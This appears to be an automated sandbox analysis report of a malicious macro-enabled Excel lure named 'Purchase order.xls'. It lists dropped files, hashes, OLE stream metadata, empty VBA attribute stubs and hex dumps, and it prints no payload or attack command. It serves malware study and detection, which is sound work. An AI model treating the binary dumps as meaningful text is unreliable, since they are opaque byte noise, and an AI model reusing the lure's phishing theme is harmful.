Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

C:\Users\user\Desktop\23530000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
Category:	dropped
Size (bytes):	1072128
Entropy (8bit):	7.365514454019629
Encrypted:	false
SSDEEP:	12288:XmzHJEyfN1YpNBPF39MZEAD3DERnLRmF8DcGLq6DrI2CxKvsWBJWk5klsRx1EYNN:+hfgp531AbARM8wgqISK5JZils71B
MD5:	50A169B3A84611E2A50546C48C417A4C
SHA1:	3807B542FAFFB066F25864BE1A318832F962D1C0
SHA-256:	F8BFD91A161A81CEF44C2361382F139C2F9C5B178E4FED987BAED6CE9A9E3BE9
SHA-512:	B2143FF6E76AFA18239C5AC459C66CC70723ECFAAEF6755FD7FF2279747F110E3020FD521334E896B7B41E98DF16316B2F911515CF0E2E0F9909732C014AD91A
Malicious:	false
Preview:	......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\23530000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Purchase order.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
Category:	dropped
Size (bytes):	1072128
Entropy (8bit):	7.365514454019629
Encrypted:	false
SSDEEP:	12288:XmzHJEyfN1YpNBPF39MZEAD3DERnLRmF8DcGLq6DrI2CxKvsWBJWk5klsRx1EYNN:+hfgp531AbARM8wgqISK5JZils71B
MD5:	50A169B3A84611E2A50546C48C417A4C
SHA1:	3807B542FAFFB066F25864BE1A318832F962D1C0
SHA-256:	F8BFD91A161A81CEF44C2361382F139C2F9C5B178E4FED987BAED6CE9A9E3BE9
SHA-512:	B2143FF6E76AFA18239C5AC459C66CC70723ECFAAEF6755FD7FF2279747F110E3020FD521334E896B7B41E98DF16316B2F911515CF0E2E0F9909732C014AD91A
Malicious:	true
Preview:	......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:30:22 2024, Security: 1
Entropy (8bit):	7.343246296130872
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Purchase order.xls
File size:	1'081'344 bytes
MD5:	a8e1c0126304e8d65c0a30873dc3d830
SHA1:	a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256:	c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
SHA512:	87ec45bd80a0b29c11900946b892134a636b6806ca87b9bce7fbbc52bfbd680436f73c61b6ce51a661b2b179cdf18577617267b68aab43a5f0f425e217f443cd
SSDEEP:	12288:0mzHJEyfN1YpuBPP39sZEVD3DERnLRmF8DCO9auag9riz5+w3Z6VM0f3kobnY1lR:Hhfgp83hVbARM8+wa5ESZUF8nN
TLSH:	4835AEC3AA198F66ED560230A6F3876A6724CC83C522472F12F4772839F77D4255AF8D
File Content Preview:	........................>.......................................................................7...............................c.......e......................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Purchase order.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-10-25 04:30:22
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 e . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 65 f2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 D . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 44 17 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 f1 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 76 b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.250350317504982
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . & . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD000EE996/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD000EE996/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD000EE996/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: MBD000EE996/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976

General
Stream Path:	MBD000EE996/\x5SummaryInformation
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:	90976
Entropy:	4.0202822243037755
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . % . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

Stream Path: MBD000EE996/MBD0002578E/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD000EE996/MBD0002578E/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD0002578E/Package, File Type: Microsoft Excel 2007+, Stream Size: 33181

General
Stream Path:	MBD000EE996/MBD0002578E/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	33181
Entropy:	7.705040299215262
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . ) ; . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e2 9b 29 3b aa 01 00 00 e0 07 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD00032715/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD000EE996/MBD00032715/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD00032715/Package, File Type: Microsoft Excel 2007+, Stream Size: 38341

General
Stream Path:	MBD000EE996/MBD00032715/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	38341
Entropy:	7.85773182578822
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD00032B6D/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD000EE996/MBD00032B6D/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD00032B6D/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484

General
Stream Path:	MBD000EE996/MBD00032B6D/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	484
Entropy:	3.922883556049869
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00

Stream Path: MBD000EE996/MBD00032B6D/\x5SummaryInformation, File Type: data, Stream Size: 19956

General
Stream Path:	MBD000EE996/MBD00032B6D/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	19956
Entropy:	3.047871976270467
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . . . % . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . \| & . . . . . . . . . . . . . . & . . . " W M F C . . . .
